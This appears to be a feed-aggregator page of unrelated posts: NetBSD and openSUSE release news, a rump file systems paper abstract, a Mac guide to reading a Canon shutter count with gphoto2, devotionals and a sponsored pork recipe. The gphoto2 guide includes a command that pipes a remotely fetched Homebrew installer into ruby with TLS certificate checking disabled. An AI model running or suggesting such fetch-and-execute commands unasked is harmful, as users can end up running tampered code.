    • iSCSI booting
  • Security:
    • RBAC kernel
    • netpgp
The current plan is to branch NetBSD 6.0 in March 2010 and release it in summer 2010.


          USENIX 2009 - Rump File Systems: Kernel Code Reborn   

At USENIX 2009 I talked about rump file systems. The paper (pdf, html) and slides are available. Additionally, USENIX members can view a video of the presentation.

paper abstract

When kernel functionality is desired in userspace, the common approach is to reimplement it for userspace interfaces. We show that use of existing kernel file systems in userspace programs is possible without modifying the kernel file system code base. Two different operating modes are explored: 1) a transparent mode, in which the file system is mounted in the typical fashion by using the kernel code as a userspace server, and 2) a standalone mode, in which applications can use a kernel file system as a library. The first mode provides isolation from the trusted computing base and a secure way for mounting untrusted file systems on a monolithic kernel. The second mode is useful for file system utilities and applications, such as populating an image or viewing the contents without requiring host operating system kernel support. Additional uses for both modes include debugging, development and testing.

The design and implementation of the Runnable Userspace Meta Program file system (rump fs) framework for NetBSD is presented. Using rump, ten disk-based file systems, a memory file system, a network file system and a userspace framework file system have been tested to be functional. File system performance for an estimated typical workload is found to be ±5% of kernel performance. The prototype of a similar framework for Linux was also implemented and portability was verified: Linux file systems work on NetBSD and NetBSD file systems work on Linux. Finally, the implementation is shown to be maintainable by examining the 1.5 year period it has been a part of NetBSD.


          How to Check a DSLR Camera's Shutter Count, Using the Canon EOS 7D as an Example   

People have different reasons for wanting to see the shutter count of a Canon DSLR: buying a used camera, selling one, or plain curiosity. In practice, it turns out that not every Canon camera makes the number easy to find. I still don't understand why the developers stubbornly hide this figure in their own software, but for us that's not a problem.

In this article I'll describe and demonstrate several ways to find out a DSLR camera's shutter count on Mac OS X.

Method 1
For this method you need Windows installed in a virtual machine or via Boot Camp, because it requires the Internet Explorer browser.

1. Connect the camera via USB and turn it on
2. Launch Internet Explorer and go to eoscount.com
3. Install the site's IE plugin
4. Reload the page

The site reports that it can read the number of shots taken. All that remains is to pay $1.69 to see the figure once, or $5.19 to monitor the counter an unlimited number of times for this one camera!

This method is good for someone who needs to sell a camera urgently or is unprepared for a sudden purchase.
Its drawbacks:
— Windows has to be present on the Mac
— an internet connection is required
— you must be able to pay for the service online

Method 2
There is a free utility, written for both Windows and Mac OS, called the 40DShutterCount v2 utility.

1. Download and install it
2. Connect the camera via USB and turn it on
3. Launch the program and press "Get count"

The result (for a Canon EOS 7D) is an error.

That's because the program doesn't support some cameras, and if you have a 7D — alas, this method is not for you!

Pros:
— software for Mac OS
— no internet needed
— no need to keep a virtual copy of Windows on the computer

Cons:
— a limited list of DSLR cameras it can query.

Method 3 — the cleanest one
I used this method back when I was a Windows user; the drawback then was maintaining a virtual Linux system. But since Mac OS is built on UNIX, this is the most correct and elegant approach, although we first have to prepare the Mac a little.

3.1 First, install Xcode from the App Store or from Apple's official site.

After installing Xcode, launch it and open its preferences, go to the Downloads tab, and click Install next to Command Line Tools. That done, let's move on.

3.2 Now install Homebrew, the package manager for OS X.

Open Terminal and enter the line:

ruby <(curl -fsSkL raw.github.com/mxcl/homebrew/go)

Press ENTER, type your account password, press ENTER again, and the installation begins…

Done, Homebrew is installed!

Keeping packages up to date is simple; just run:
brew update

3.3 The last step is installing gPhoto2.

In the terminal, type:
brew install gphoto2

and wait… done!

Check that it works. In the terminal, enter:
gphoto2 --list-config

Excellent; all that's left is to connect the camera!

P.S.
If you happen to get an error like:
*** Error ***              
An error occurred in the io-library ('Could not claim the USB device'): Could not claim interface 0 (Permission denied). Make sure no other program or kernel module (such as sdc2xx, stv680, spca50x) is using the device and you have read/write access to the device.
*** Error (-53: 'Could not claim the USB device') ***    

run the command:
killall PTPCamera

and repeat:
gphoto2 --list-config

Everything works; setup is complete.

Summary
Now, whenever the camera is connected to the Mac, finding out how many shots it has taken requires only a flick of the wrist:

1. Connect the camera via USB and turn it on
2. In the terminal, run gphoto2 --list-config
3. Then run gphoto2 --get-config /main/status/shuttercounter
and observe the result.

That's all.

You can bookmark this article and use it as a reminder if you forget anything.
Good luck!

Permanent address of this post: www.macintoshim.ru
          Stacking the Bricks - The Creative Atom   

The Creative Atom is a kernel you can build on, and grow, and evolve… just as many atoms become a molecule, and many molecules become a bacterium or a chair.

The post The Creative Atom appeared first on bootstrappers.io.


          Carlos Alberto Ferreira Filho: openSUSE Tumbleweed - Review of Week 26, 2017   

A new review of what happened during week 26 of 2017 in openSUSE Tumbleweed, the rolling-release, continuously updated version of the openSUSE GNU/Linux distribution.

You can read the original announcement on Dominique Leuenberger's blog at the link below:

http://dominique.leuenberger.net/blog/2017/06/review-of-the-week-201726/

This week three snapshots were released (0625, 0626 and 0628). Due to problems with openQA during the last weekend, the two snapshots 0623 and 0624 were discarded (even though they would have been good). 0627 was held back because it would have shipped a non-working bind (after OpenSSL changed the location of the engines again). But, as usual, a discarded snapshot just means the updates reach you one snapshot later.

The three snapshots brought these interesting changes:
  •     OpenSSL 1.0.2l
  •     gdb 8.0
  •     GStreamer 1.12.1
  •     Linux Kernel 4.11.7
  •     LibreOffice 5.4.0.1 (rc1)
  •     gucharmap 10 - with Unicode 10 support
Several users have asked during the last week about shipping LibreOffice 5.4 beta2. As with everything in Tumbleweed, the maintainers decide whether a package or code base is of sufficient quality to be updated. openQA will ensure a minimum level of quality, but its tests are only as broad as what our contributors describe in tests. If you know of something you would like to see tested, just get in touch with us and we will find a way to get you started helping implement the new tests.

Other items currently queued to be added to Tumbleweed:
  •  NetworkManager 1.8
  •  KDE Frameworks 5.35.0
  •  automake 1.15.1 - if your package was bootstrapped with 1.15.0 and implicitly calls automake, this may result in failures (call automake explicitly when you patch sources)
  •  Linux Kernel 4.11.8
  •  libzypp: change of the default setting to 'allow vendor change to false' during zypper dup (just a change in the zypp.conf file shipped by default)
These are the most impactful items at the moment. The maintainers have told us on the mailing list about some larger, more impactful modifications that are a bit further away. You may want to weigh in on the mailing lists directly.
  • Drop php5 (php7 has already been in Tumbleweed for a long time) 
  •  Use python3 as the default python interpreter (as /usr/bin/python)
With all these nice things: have a great weekend and have a lot of fun with your updated Tumbleweed system.

https://build.opensuse.org/project/staging_projects/openSUSE:Factory

The ISOs are unstable, but if you already use openSUSE Tumbleweed on your machine, simply update it with the "zypper up" command and your system will receive the updates. To download, use the link below:

https://en.opensuse.org/openSUSE:Tumbleweed_installation
 
Stay up to date and, you know: have a lot of fun!

          Dominique Leuenberger: Review of the week 2017/26   

Dear Tumbleweed users and hackers,

This week I can only offer you 3 snapshots (0625, 0626 and 0628); Due to issues with openQA during the last weekend, the two snapshots 0623 and 0624 were discarded (even though they would have been good). 0627 was held back because we would have shipped a non-working bind in there (after OpenSSL changed the location of the engines again). But as usual, of course, a discarded snapshot just means the updates reach you one snapshot later.

The three snapshots brought you these interesting changes:

  • OpenSSL 1.0.2l
  • gdb 8.0
  • GStreamer 1.12.1
  • Linux Kernel 4.11.7
  • LibreOffice 5.4.0.1 (rc1)
  • gucharmap 10 – with Unicode 10 support

Various users have been asking during the last week about the shipment of LibreOffice 5.4beta2. Like with everything in Tumbleweed, it is up to the maintainers to decide if a package/code base is of sufficient quality to be updated. openQA will take care to ensure we maintain a certain level of quality as a minimum – but the tests there only cover what our contributors have written tests for. If you know of anything you’d like to see tested, simply get in touch with us and we’ll find a way to get you started in helping implement the new tests.

Further things currently queued up in Stagings:

  • NetworkManager 1.8
  • KDE Frameworks 5.35.0
  • automake 1.15.1 – if your package was bootstrapped with 1.15.0 and implicitly calls automake, this might give failures (call automake explicitly when you patch sources)
  • Linux Kernel 4.11.8
  • libzypp: change of default setting for ‘allow vendor change to false’ during zypper dup (just a change in the default shipped zypp.conf file)
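
The libzypp item above amounts to a one-line default in the shipped configuration file. A sketch of what that looks like in /etc/zypp/zypp.conf; the option name solver.dupAllowVendorChange is libzypp's solver setting, but treat the exact spelling here as an assumption to check against the shipped file:

```
## /etc/zypp/zypp.conf (sketch)
## Keep the installed vendor during `zypper dup` instead of letting
## packages switch vendors silently:
solver.dupAllowVendorChange = false
```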

These are the largest impacting things out there at the moment. Maintainers informed us on the mailing list about some larger-impact modifications that are a bit further away. You might want to weigh in on the mailing lists directly:

  • Drop php5 (php7 has been in Tumbleweed for a long time already)
  • Use python3 as default python interpreter (as /usr/bin/python)

 


          Patch On Linux Kernel Stable Branches Breaks rr   

A change in 4.12rc5 breaks rr. We're trying to get it fixed before 4.12 is released, and I think that will be OK. Unfortunately that change has already been backported to 3.18.57, 4.4.72, 4.9.32 and 4.11.5 :-( (all released on June 14, and I guess arriving in distros a bit later). Obviously we'll try to get the 4.12 fix also backported to those branches, but that will take a little while.

The symptoms are that long, complex replays fail with "overshot target ticks=... by N" where N is generally a pretty large number (> 1000). If you look in the trace file, the value N will usually be similar to the difference between the target ticks and the previous ticks value for that task --- i.e. we tried to stop after N ticks but we actually stopped after about 2N ticks. Unfortunately, rr's tests don't seem to be affected, so they don't catch the problem.

I'm not sure if there's a reasonable workaround we can use in rr, or if there is one, whether it's worth effort to deploy. That may depend on how the conversation with upstream goes.

          John 12:24   
Driving through the beautiful, bucolic farmlands of south central Pennsylvania, I noticed the gloriously golden wheat fields and pondered these words spoken by Jesus.  

I tell you the truth, unless a kernel of wheat falls to the ground and dies, it remains only a single seed. But, if it dies, it produces many seeds.  John 12:24

Glorious Father-
Thank you for this beautiful word picture. Like a grain of wheat that falls to the ground and dies to live anew, I lay down all my dreams and worldly desires to follow you. Plant me wherever you want to produce a harvest for your Kingdom. Press down on me, crush me, and break me. Soften me and release me to press upward to reproduce an enormous multiplication of blessings.

God please crucify me with Jesus - fully yielded, completely surrendered, totally submitted. Use the problems and challenges that are part of my every day life to put me to death. Then raise me, like a kernel of wheat to an abundant ... victorious ... blessed ... fruitful ... powerful ... Christ-like ... Spirit-filled life. I love you Lord and want to be more like you! In Jesus name, I surrender all. Amen.

What do you need to surrender in order to reproduce abundant blessings for the Kingdom of God?

Make a deliberate determination to be interested only in what interests God. Intentionally, remove everything from your life that keeps you from following God's dreams and plans. Concentrate on the Son who did not give up when He had to suffer shame and die on a cross. He knew of the joy that would be His later. This joy will be yours too, if only you will die to yourself and devote your life to Him.

O. Chambers writes (06/19) in My Utmost For His Highest, "The secret of a disciple's life is devotion to Jesus Christ, and the characteristic of that life is its seeming insignificance and its meekness. Yet it is like a grain of wheat that "falls into the ground and dies" - it will spring up and change the entire landscape."

          Psalm 126   
Psalm 126
When the LORD restored his exiles to Jerusalem,
it was like a dream!
We were filled with laughter,
and we sang for joy.
And the other nations said,
"What amazing things the LORD has done for them."
Yes, the LORD has done amazing things for us!
What joy!

Restore our fortunes, LORD,
as streams renew the desert.
Those who plant in tears
will harvest with shouts of joy.
They weep as they go to plant their seed,
but they sing as they return with the harvest. NLT

How Great You are O Sovereign King! There is none like You!

Lord, overwhelming sorrow tries to take me away from You. Battered and bruised by the battle with the enemy, a fountain of tears flows from my eyes. Wounded and worn out, I weep. Gripped by grief, I'm a miserable mess. Rescue me! Restore my fortune! Bring me back to the peace of Your presence.

Help me to plant kernels of love, joy, peace, patience, kindness, goodness, faithfulness, humility and discipline in the soil surrounding my sadness. I will gently water them with a steady stream of tears. And, then I will patiently wait through the season of sorrow for the promised heavenly harvest.

When I joyfully return with baskets full of bountiful blessings I will share a foretaste of glory divine with those around me. They will notice that You have done amazing things for me! Together, we will sing, laugh and celebrate a yield of sweet succulent spiritual fruit. I believe that You will turn my hard situation into an enormous reward for the praise of Your glory! Amen.

What has taken you away from your Sovereign King? It could be sin, addiction, false teaching, idolatry, ministering to someone needy, transition, a new job, busyness, or love to name a few. Identify the thing that holds you captive and break free! Plant the seed of His Word in the soil of your situation, water it with your tears and patiently endure while it grows. Then reap the bountiful blessed harvest and celebrate the amazing things the Lord has done! 

          The Design and Implementation of the Anykernel and Rump Kernels, 2nd Edition   
The definitive technical guide to the core of the Rump Kernel project.
          Device Driver Development Engineer - Intel - Singapore   
Knowledge of XDSL, ETHERNET switch, wireless LAN, Security Engine and microprocessor is an advantage. Linux Driver/Kernel development for Ethernet/DSL/LTE Modem...
From Intel - Sat, 17 Jun 2017 10:23:08 GMT - View all Singapore jobs
          Slackware: 2017-181-02: kernel Security Update   
LinuxSecurity.com: New kernel packages are available for Slackware 14.2 and -current to fix security issues.
          The First Alpha of Ubuntu 17.10 Is Available for Opt-in Flavors   
The first alpha of Ubuntu 17.10 Artful Aardvark was released earlier today. It features images for Lubuntu, Kubuntu, and Ubuntu Kylin. The pre-release uses the kernel and graphics stacks of Ubuntu 17.04, which include Linux Kernel 4.10, X.Org Server 1.19.3 display server, and Mesa 17.1.2 3D Graphics Library. The systemd init system, however, was upgraded […]
          PCIe (PCI Express) eSATA / SATA Card for Macintosh Lion   
If you want to add an eSATA or SATA controller card to your Mac (Lion), there is not exactly a large selection. For the operating system to keep running without a "kernel panic", the hardware should be chosen carefully. Apparently the optimal […]
          Adrian Sutton: Fun with Nvidia Drivers and Fedora Upgrades   

After any major Fedora upgrade my system loses the proprietary nvidia drivers that make X actually work (I’ve never successfully gotten the nouveau drivers to handle my card and multi-monitor setup) so the system reboots and simply presents an “oops, something went wrong” screen.

The issue seems to be that the nvidia driver doesn’t recompile for the new kernel, despite the fact that I’m using akmod packages which should in theory automatically recompile for new kernels.

The tell-tale sign is:

[   161.484] (II) LoadModule: "nv"
[   161.484] (WW) Warning, couldn't open module nv
[   161.484] (II) UnloadModule: "nv"
[   161.484] (II) Unloading nv
[   161.484] (EE) Failed to load module "nv" (module does not exist, 0)

in the Xorg logs.

Some digging reveals that the akmod recompilation process should be triggered by /etc/kernel/postinst.d/akmodsposttrans but for whatever reason that didn’t run.

The key piece of that script was running akmods similar to:

/usr/sbin/akmods --from-kernel-posttrans --kernels 4.8.11-300.fc25.x86_64

The last argument is the current kernel version, which should match the directory name in /lib/modules/ – there will likely be a few options, either run the command for each of them or pick the latest which is likely to be the one missing the nvidia drivers.

Run that command for the kernel that is missing the drivers, reboot, and everything should come back just fine, though there is likely a better way to do it…
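
Since picking the right version string by hand is error-prone, the loop below prints (rather than runs) the akmods invocation for every kernel installed under /lib/modules, so you can run the one for the kernel that is missing the driver. A sketch on my part, assuming akmods lives at /usr/sbin/akmods as in the post:

```shell
#!/bin/sh
# Print an akmods rebuild command for each installed kernel.
# The directory names under /lib/modules are the kernel version strings.
for dir in /lib/modules/*/; do
    kver=$(basename "$dir")
    echo "/usr/sbin/akmods --from-kernel-posttrans --kernels $kver"
done
```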


             
TechComparison - Linux Virtualization Wiki:  Interesting comparison chart of virtualization technologies.  Also: a story of a satisfied Xen user.

          A Note on Some Approximation Kernels on the Sphere. (arXiv:1706.09456v1 [math.CA])   

Authors: Peter J. Grabner

We produce precise estimates for the Kogbetliantz kernel for the approximation of functions on the sphere. Furthermore, we propose and study a new approximation kernel, which has slightly better properties.


          On the heat content for the Poisson kernels over sets of finite perimeter. (arXiv:1706.09477v1 [math.PR])   

Authors: Luis Acuna Valverde

This paper studies the small time behavior of the heat content for the Poisson kernel over a bounded open set $D\subset \mathbb{R}^d$, $d\geq 2$, of finite perimeter by working with the set covariance function. As a result, we obtain a third order expansion involving geometric features related to the underlying set $D$. We provide the explicit form of the third term for the unit ball when $d=2$ and $d=3$ and supply some results concerning the square $[-1,1]\times [-1,1]$.


          Metric duality between positive definite kernels and boundary processes. (arXiv:1706.09532v1 [math.FA])   

Authors: Palle Jorgensen, Feng Tian

We study representations of positive definite kernels $K$ in a general setting, but with view to applications to harmonic analysis, to metric geometry, and to realizations of certain stochastic processes. Our initial results are stated for the most general given positive definite kernel, but are then subsequently specialized to the above mentioned applications. Given a positive definite kernel $K$ on $S\times S$ where $S$ is a fixed set, we first study families of factorizations of $K$. By a factorization (or representation) we mean a probability space $\left(B,\mu\right)$ and an associated stochastic process indexed by $S$ which has $K$ as its covariance kernel. For each realization we identify a co-isometric transform from $L^{2}\left(\mu\right)$ onto $\mathscr{H}\left(K\right)$, where $\mathscr{H}\left(K\right)$ denotes the reproducing kernel Hilbert space of $K$. In some cases, this entails a certain renormalization of $K$. Our emphasis is on such realizations which are minimal in a sense we make precise. By minimal we mean roughly that $B$ may be realized as a certain $K$-boundary of the given set $S$. We prove existence of minimal realizations in a general setting.


          Quantitative estimate of propagation of chaos for stochastic systems with $W^{-1, \infty}$ kernels. (arXiv:1706.09564v1 [math.AP])   

Authors: Pierre-Emmanuel Jabin, Zhenfu Wang

We derive quantitative estimates proving the propagation of chaos for large stochastic systems of interacting particles. We obtain explicit bounds on the relative entropy between the joint law of the particles and the tensorized law at the limit. For this we have to develop new laws of large numbers at the exponential scale. But our result only requires very weak regularity on the interaction kernel in the negative Sobolev space $\dot W^{-1,\infty}$, thus including the Biot-Savart law and the point vortex dynamics for the 2d incompressible Navier-Stokes equations.


          Accelerated nonlocal nonsymmetric dispersion for monostable equations on the real line. (arXiv:1706.09647v1 [math.AP])   

Authors: Dmitri Finkelshtein, Pasha Tkachov

We consider the accelerated propagation of solutions to equations with a nonlocal linear dispersion on the real line and monostable nonlinearities (both local or nonlocal), in the case when either the dispersion kernel or the initial condition has regularly heavy tails at both $\pm\infty$, perhaps different. We show that, in such a case, the propagation to the right is fully determined by the right tails of either the kernel or the initial condition. We describe both the cases of integrable and monotone initial conditions, which may give different orders of the acceleration. Our approach is based, in particular, on an extension of the theory of sub-exponential distributions, which we introduced earlier in arXiv:1704.05829 [math.PR].


          Littlewood-Paley-Stein operators on Damek-Ricci spaces. (arXiv:1706.09743v1 [math.AP])   

Authors: Anestis Fotiadis, Effie Papageorgiou

We obtain pointwise upper bounds on the derivatives of the heat kernel on Damek-Ricci spaces. Applying these estimates we prove the $L^p$-boundedness of Littlewood-Paley-Stein operators.


          An explicit formula for Szego kernels on the Heisenberg group. (arXiv:1706.09762v1 [math.CV])   

Authors: Hendrik Herrmann, Chin-Yu Hsiao, Xiaoshan Li

In this paper, we give an explicit formula for the Szego kernel for $(0, q)$ forms on the Heisenberg group $H_{n+1}$.


          On the Bickel-Rosenblatt test of goodness-of-fit for the residuals of autoregressive processes. (arXiv:1706.09811v1 [math.ST])   

Authors: Agnès Lagnoux, Thi Mong Ngoc Nguyen, Frédéric Proïa

We investigate in this paper a Bickel-Rosenblatt test of goodness-of-fit for the density of the noise in an autoregressive model. Since the seminal work of Bickel and Rosenblatt, it is well-known that the integrated squared error of the Parzen-Rosenblatt density estimator, once correctly renormalized, is asymptotically Gaussian for independent and identically distributed (i.i.d.) sequences. We show that the result still holds when the statistic is built from the residuals of general stable and explosive autoregressive processes. In the univariate unstable case, we also prove that the result holds when the unit root is located at $-1$ whereas we give further results when the unit root is located at $1$. In particular, we establish that except for some particular asymmetric kernels leading to a non-Gaussian limiting distribution and a slower convergence, the statistic has the same order of magnitude. Finally we build a goodness-of-fit Bickel-Rosenblatt test for the true density of the noise together with its empirical properties on the basis of a simulation study.


          On the Cartier Duality of Certain Finite Group Schemes of order $p^n$, II. (arXiv:1210.3980v8 [math.AG] UPDATED)   

Authors: Michio Amano

We explicitly describe the Cartier dual of the $l$-th Frobenius kernel $N_l$ of the deformation group scheme, which deforms the additive group scheme to the multiplicative group scheme. Then the Cartier dual of $N_l$ is given by a certain Frobenius type kernel of the Witt scheme. Here we assume that the base ring $A$ is a $Z_{(p)}/(p^n)$-algebra, where $p$ is a prime number. The obtained result generalizes a previous result by the author which assumes that $A$ is a ring of characteristic $p$.


          A Polyakov formula for sectors. (arXiv:1411.7894v4 [math.SP] UPDATED)   

Authors: Clara L. Aldana, Julie Rowlett

We consider finite area convex Euclidean circular sectors. We prove a variational Polyakov formula which shows how the zeta-regularized determinant of the Laplacian varies with respect to the opening angle. Varying the angle corresponds to a conformal deformation in the direction of a conformal factor with a logarithmic singularity at the origin. We compute explicitly all the contributions to this formula coming from the different parts of the sector. In the process, we obtain an explicit expression for the heat kernel on an infinite area sector using Carslaw-Sommerfeld's heat kernel. We also compute the zeta-regularized determinant of rectangular domains of unit area and prove that it is uniquely maximized by the square.


          Backing up Android application data for a transfer to another device.   

Freshly equipped with the brand-new Galaxy S4, I was looking for a way to recover application data. Careful: ADB can only back up from ICS (Ice Cream Sandwich) onwards.

You can of course use a pile of Market applications to back up and restore SMS, apps, and so on, but none of them can back up an application's data, so you inevitably lose scores, bonuses and other settings...

After trying a few applications without success, and not really wanting to go through a software solution, I decided to try ADB, the utility that ships with Android's Software Development Kit, the SDK.

A warning before you "break" your brand-new Galaxy S4: be careful, and don't do what this fool did, which was to carelessly restore data coming from a custom ROM onto an official ROM... you'll tell me: no comment...

In short, it is wise to pick only the applications actually worth transferring, because our friend ADB is capable of doing a full DATA + APP backup.

Environment

I'm on Win8 x64; I downloaded the Android SDK and unpacked it into a suitable directory.

You will also need to install the Java SDK.

ADB cannot be used without getting the kernel matching your Android version, so start the SDK manager by double-clicking android.bat in C:\Program Files\adt-bundle-windows-x86_64-20130522\adt-bundle-windows-x86_64-20130522\sdk\tools and select the matching Android version, 4.2.2:

ADB1.png

Once that's done, go to the SDK directory: C:\Program Files\adt-bundle-windows-x86_64-20130522\adt-bundle-windows-x86_64-20130522\sdk\platform-tools

Enable USB debugging on your device, under the developer options in Settings.
Connect the source phone over USB.
From a DOS command window, check that the phone responds:
adb devices
It should answer with an ID + device. Cool, everything's fine!

The backup

Now let's find the packages we want to save from the list of installed packages.
adb shell pm list packages -f > list.txt
This gives us a list of all the applications on the phone. Each entry has the form:
package:/mnt/asec/com.kiloo.subwaysurf-2/pkg.apk=com.kiloo.subwaysurf
In my case only a few games and a few applications that are a pain to configure are candidates for the restore, so just take the name after pkg.apk=.
Here, com.kiloo.subwaysurf.
I then back up the application and its data with the following command:
adb backup -apk -noshared -nosystem com.kiloo.subwaysurf -f com.kiloo.subwaysurf.ab
The backup file ends up in my SDK's local directory. The ADB options can be found here. You will have to confirm the transfer on the phone side.
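
Backing up several packages one by one gets tedious; the sketch below turns the list.txt produced above into one adb backup command per package. It only prints the commands so you can review them before running them, and the sed pattern assumes the package:/path=name line format shown above:

```shell
#!/bin/sh
# Generate a per-package `adb backup` command line from list.txt
# (output of `adb shell pm list packages -f`). Review the output, then
# run the lines you want; each backup still has to be confirmed on the
# phone.
sed -n 's/^package:.*=//p' list.txt | while read -r pkg; do
    echo "adb backup -apk -noshared -nosystem $pkg -f $pkg.ab"
done
```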

The restore

Unplug the source phone. For extra safety, kill the ADB service in the Windows Task Manager.
Plug in the target phone.
Then launch the restore with the following command:
adb restore com.kiloo.subwaysurf.ab
You will again have to confirm the restore on the phone side.
If something goes wrong, stop the ADB process and start over...

Going further

To back up all the applications on the phone, use the following command:
adb backup -all -apk -noshared -nosystem -f galaxyS2-backup.ab
You can then turn this archive into a TAR file to browse or modify it. I found a Java executable here for converting in either direction.
adb4.png

          Debian 6.0 (Squeeze) under Hyper-V: getting the virtual network card drivers working & taking the network out of LEGACY mode.   
When you install Debian under Hyper-V you have to do it with an emulated (LEGACY) network card, which later proves limiting if the VM is used as a server: reachability on the network is impossible or very limited. You therefore have to recompile the kernel to enable Hyper-V support.

In my case I had to set up a monitoring server that could not reach the Hyper-V server and which, on top of that, was painfully slow...

As root, of course ;), we start by downloading a kernel from the official Linux Kernel repository; let's go wild and take the latest version :)

sudo apt-get install git-core kernel-package fakeroot build-essential ncurses-dev
cd /usr/src
wget --continue http://www.kernel.org/pub/linux/kernel/v3.0/linux-3.6.6.tar.bz2
tar jxvf linux-3.6.6.tar.bz2
cd linux-3.6.6

We copy the old config into the new source tree:

cp /boot/config-`uname -r` ./.config

Next we launch the kernel configuration menu:

make menuconfig

For reference, everything related to Hyper-V lives under the following submenus:

DEVICE DRIVERS / NETWORK DEVICE SUPPORT / MICROSOFT HYPER-V VIRTUAL NETWORK DRIVER


DEVICE DRIVER    / MICROSOFT HYPER-V CLIENT DRIVER
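
After saving from menuconfig you can confirm the options actually landed in .config before spending time compiling. A quick check; the CONFIG_HYPERV* names below are the ones used by 3.x kernels, worth verifying against your own tree:

```shell
#!/bin/sh
# List the Hyper-V related options enabled in the kernel .config
# (=y means built in, =m means module). Run from the kernel source
# directory after `make menuconfig`.
grep -E '^CONFIG_HYPERV(_NET|_STORAGE|_UTILS)?=' .config
```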

compilLinuxDebian.png
Once your options are selected, compile...

make-kpkg clean
fakeroot make-kpkg --initrd --append-to-version=-hyper-v kernel_image kernel_headers


And then go off and prepare dinner, or lunch as the case may be... :)

When we come back, we install the new kernel and reboot:

cd ..
dpkg -i linux-image-3.6.*
reboot


Let's check that the modules have been loaded:

lsmod | grep 'hv_'
hv_utils                4556  0
cn                      3509  1 hv_utils
hv_storvsc              7623  2
hv_netvsc              15083  0
scsi_mod              161603  3 sd_mod,hv_storvsc,libata
hv_vmbus               28424  3 hv_utils,hv_storvsc,hv_netvsc


cat /var/log/messages | grep 'hv_'
.......
Nov 20 16:37:41 monitoring kernel: [    0.444447] hv_vmbus: child device vmbus_0_1 registered
Nov 20 16:37:41 monitoring kernel: [    0.444506] hv_vmbus: child device vmbus_0_2 registered
Nov 20 16:37:41 monitoring kernel: [    0.444553] hv_vmbus: child device vmbus_0_3 registered
Nov 20 16:37:41 monitoring kernel: [    0.444597] hv_vmbus: child device vmbus_0_4 registered
Nov 20 16:37:41 monitoring kernel: [    0.444642] hv_vmbus: child device vmbus_0_5 registered
Nov 20 16:37:41 monitoring kernel: [    0.444689] hv_vmbus: child device vmbus_0_6 registered
Nov 20 16:37:41 monitoring kernel: [    0.444733] hv_vmbus: child device vmbus_0_7 registered
Nov 20 16:37:41 monitoring kernel: [    0.444777] hv_vmbus: child device vmbus_0_8 registered
Nov 20 16:37:41 monitoring kernel: [    0.444821] hv_vmbus: child device vmbus_0_9 registered
Nov 20 16:37:41 monitoring kernel: [    0.444897] hv_vmbus: child device vmbus_0_10 registered
Nov 20 16:37:41 monitoring kernel: [    5.444163] hv_vmbus: registering driver hv_netvsc
Nov 20 16:37:41 monitoring kernel: [    5.445448] hv_vmbus: registering driver hv_storvsc
Nov 20 16:37:41 monitoring kernel: [    5.445541] hv_netvsc: hv_netvsc channel opened successfully
Nov 20 16:37:41 monitoring kernel: [    5.548471] hv_netvsc vmbus_0_10: Device MAC 00:15:5d:00:49:19 link state up
Nov 20 16:37:41 monitoring kernel: [   24.814342] hv_utils: Registering HyperV Utility Driver
Nov 20 16:37:41 monitoring kernel: [   24.814347] hv_vmbus: registering driver hv_util


After that, I'll spare you the details of how to switch a LEGACY card over to a classic network card :)
          CYANOGEN 9 NIGHTLY on the Galaxy S2   

CYANOGENMOD_915156.jpg
I got fed up waiting for SAMSUNG's ICS ROM, so I decided to go back to CYANOGEN, a ROM I had already tested on an HTC Desire.

Let's start with a warning. As I state here, the manipulations described below can potentially brick your phone. I cannot be held responsible if your phone turns into a brick and becomes unusable.
I did not try to back up application data; I didn't need it.

For my part, my S2 is an I9100 (NOT an I9100G!!!)

Back up your phone before anything else

Now this is the good part: imagine reflashing your phone and getting back all your contacts, SMS and call history!!!
Start by going to the ANDROID MARKET and downloading two free applications:
The first will back up all your applications. The second will back up the SMS, the contacts, and the call logs.
Once cyanogen is up and running, you will have to reinstall these applications to put the data back in place.
Check, by connecting the phone to your PC over USB, that the backup directories are indeed present on the SD card.
Just in case, check that your photos really are on the SD card, and as a safety measure transfer your SD card data to your PC.

Installing the "ClockWorkMod Recovery"

The ClockWorkMod is in fact the phone's kernel. It is what will give you the ability to boot the phone in update mode so that CYANOGEN can be installed. Here is the procedure.

Go to the cyanogen site and download the prerequisites, namely:

  • codeworkx's Kernel with the ClockworkMod Recovery.
  • Heimdall Suite.
  • The version of cyanogen you want to install.
  • The base GOOGLE applications.

Unpack the Kernel (ClockworkMod) and the Heimdall Suite. Copy the Kernel, a file named zImage, from the unpacked "ClockworkMod" directory into the directory containing the Heimdall suite.

Copy the CYANOGEN ROM and the GOOGLE applications to the root of the SD card in the phone.

Recovery mode: without connecting it to the PC, boot the phone into RECOVERY mode by pressing the VOLUME DOWN, HOME and POWER buttons simultaneously; at the prompt, press the volume up button to confirm.
Then go to the directory containing the Heimdall suite, more precisely its Drivers directory.
There you will find a program named zadig.exe. Double-click it and a window opens. Connect the phone to the PC with the cable. Click Options in the top menu, then LIST ALL DEVICES. In the drop-down list you should see GADGET SERIAL appear; select it and click the big INSTALL DRIVER button.
Close Zadig, then open a command prompt in administrator mode, go to the \heimdall-suite-1.3.2-win32\Heimdall Suite\ directory, and enter the following command: heimdall flash --kernel zImage

flashingS2.png

And there you go: the kernel is installed and the phone reboots on its own.

DON'T PANIC: two things happen. A BIG EXCLAMATION MARK tells you that you have just voided your phone's warranty, and the phone no longer wants to BOOT. That's normal, because you now have to install the ROM.

Installing CYANOGEN 9

Even if the phone seems unresponsive, press the VOLUME UP, HOME and POWER buttons simultaneously until the screen below appears:

modeRecovery

You then need to erase all the data on the phone; this will improve the ROM's stability.
Select all of the following options:

- Wipe data/factory reset
- Wipe cache partition
- Wipe Dalvik cache (advanced)
- Wipe battery stats (advanced), optional
- Format System (mount and storage)
- Format cache (mount and storage)
- Format data (mount and storage)

Finally, install the ROM, as well as the GOOGLE APPS, using the install ZIP FROM SDCARD menu.

Reboot the phone.

The exclamation mark at boot

To remove this exclamation mark and reset the SAMSUNG flash counter to zero, I found a small program on the XDA forum. Careful: use it with caution; apparently it can render the phone unusable!




          Bacon Crusted Pork Tenderloin with Summer Squash Succotash    
[FTC Standard Disclaimer]  This post is sponsored by Smithfield's line of Marinated Fresh Pork products.  Any stated opinions are my own.

Summer time is here and that means time for some of the best vegetables of the year.  Summer can also mean chaotic schedules but that doesn't mean you don't have time to make a quick dinner like this Bacon Crusted Pork Tenderloin with Summer Squash Succotash.

Smithfield Marinated Fresh Pork #RealFlavorRealFast

I was able to get this done in about 30 minutes because I used Smithfield's Hardwood Smoked Bacon and Cracked Black Pepper Marinated Fresh Pork Tenderloin for the main course.  They already did the prep work for me, including that bacon crust.  I didn't have to do anything other than take it out of the package and roast it.

